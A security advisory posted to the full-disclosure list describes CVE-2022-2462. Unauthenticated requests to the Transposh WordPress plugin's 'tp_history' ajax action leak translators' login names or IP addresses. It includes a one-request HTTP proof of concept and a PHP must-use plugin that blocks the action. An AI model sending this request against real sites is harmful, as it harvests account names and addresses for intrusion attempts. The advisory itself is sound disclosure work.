List:       full-disclosure
Subject:    [FD] [CVE-2022-2462] Transposh <= 1.0.8.1 “tp
From:       "Julien Ahrens (RCE Security)" <info () rcesecurity ! com>
Date:       2022-07-22 14:48:58
Message-ID: A2CCC878-3D86-45E0-BA9B-10DFEC8BB630 () rcesecurity ! com

RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product:        Transposh WordPress Translation
Vendor URL:     https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/
Type:           Exposure of Sensitive Information to an Unauthorized Actor [CWE-200]
Date found:     2022-07-13
Date published: 2022-07-22
CVSSv3 Score:   5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
CVE:            CVE-2022-2462


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
Transposh WordPress Translation 1.0.8.1 and below


4. INTRODUCTION
===============
Transposh translation filter for WordPress offers a unique approach to blog
translation. It allows your blog to combine automatic translation with human
translation aided by your users with an easy to use in-context interface.

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
Transposh offers an ajax action called "tp_history" which is intended to return
data about who has translated the text identified by the "token" parameter. The
action is reachable without authentication, and the response also includes the
translating user's WordPress login name in the "user_login" attribute.

Successful exploits can allow an unauthenticated attacker to leak the WordPress
usernames of translators. If an anonymous user submitted the translation, the
response contains that user's IP address instead.


6. PROOF OF CONCEPT
===================
The following Proof-of-Concept returns the information of the translated text
"Calendly URL":

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: [host]
Content-Length: 46
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0
Connection: close

action=tp_history&token=Calendly%20URL&lang=en


7. SOLUTION
===========
None. Remove the plugin to prevent exploitation.
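If removing the plugin is not an option, a site-side mitigation is a must-use plugin that answers the unauthenticated "tp_history" ajax action before Transposh's own handler runs. This is an added example written for this advisory, not code from the Transposh project; it assumes Transposh registers its handler on the standard wp_ajax_nopriv_tp_history hook at the default priority (10), and the function name rcesec_block_tp_history is a hypothetical choice.

```php
<?php
/**
 * Plugin Name: Block unauthenticated tp_history (CVE-2022-2462 mitigation)
 * Description: Added example, not part of Transposh. Place this file in
 *              wp-content/mu-plugins/ so it loads before regular plugins.
 */

// admin-ajax.php fires "wp_ajax_nopriv_{action}" for requests without a
// logged-in user. Registering at priority 0 runs this callback ahead of the
// plugin's handler (assumed to use the default priority 10), so the
// "user_login" / IP address data is never emitted to anonymous callers.
add_action( 'wp_ajax_nopriv_tp_history', 'rcesec_block_tp_history', 0 );

function rcesec_block_tp_history() {
    // Record the attempt in the PHP error log so blocked probes are visible
    // to whoever monitors the site.
    $ip = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown';
    error_log( sprintf( 'tp_history blocked for unauthenticated request from %s', $ip ) );

    // Ends the request with an HTTP 403 JSON error; wp_send_json_error()
    // terminates execution itself, so the plugin's handler never runs.
    wp_send_json_error( array( 'message' => 'Authentication required.' ), 403 );
}
```

Logged-in users still reach the plugin's own handler via wp_ajax_tp_history, so this only closes the unauthenticated path described in the advisory.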


8. REPORT TIMELINE
==================
2022-07-13: Discovery of the vulnerability
2022-07-13: CVE requested from WPScan (CNA)
2022-07-18: No response from WPScan
2022-07-18: CVE requested from Wordfence (CNA) instead
2022-07-18: Sent note to vendor
2022-07-18: Wordfence assigns CVE-2022-2462
2022-07-20: Vendor states that there is no update planned so far
2022-07-22: Public disclosure


9. REFERENCES
=============
https://github.com/MrTuxracer/advisories



